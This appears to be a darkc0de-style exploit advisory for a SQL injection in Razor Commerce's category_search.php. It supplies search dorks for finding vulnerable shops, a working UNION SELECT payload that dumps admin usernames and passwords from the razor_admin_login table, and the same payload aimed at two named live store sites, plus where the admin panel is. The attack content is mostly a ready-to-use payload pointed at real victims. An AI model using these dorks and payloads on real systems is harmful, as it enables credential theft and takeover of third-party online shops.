Razor Commerce suffers from a remote SQL injection vulnerability in category_search.php.
d26d9f0eee1ab0f9d3bd85c17b8586e15e92d24948cbf4494cd34751c7dd1c89
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
# and all darkc0de members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com
#
# Email : r45c4l@hotmail.com
#
# Share the c0de!
#
################################################################
#
# Title: Razor Commerce SQL Vulnerability (category_search.php)
#
# Vendor: http://www.razorcommerce.com/
#
# Demo: http://www.razorcommerce.com/cart/cart_demo.php
#
# The exploit was originally discovered by rsauron (thanks bro) and its further exploited by me P47r1ck.
###########################################################
#
# d0rk 1: inurl:"category_search.php?id="
#.dork 2: Powered by Razor Commerce
#
###########################################################
POC:-
http://site.com/user/category_search.php?id=-1+union+select+all+1,concat(username,0x3a,password),3,4,5,6,7,8+from+razor_admin_login--
Live Demo:
http://wildinvites.com/user/category_search.php?id=-1+union+select+all+1,concat(username,0x3a,password),3,4,5,6,7,8+from+razor_admin_login--
http://www.ezfashionboutique.com/user/category_search.php?id=-1+union+select+all+1,concat(username,0x3a,password),3,4,5,6,7,8+from+razor_admin_login--
Admin panel is at /admin/ i.e www.site.com/admin/
###########################################################
#
#
###########################################################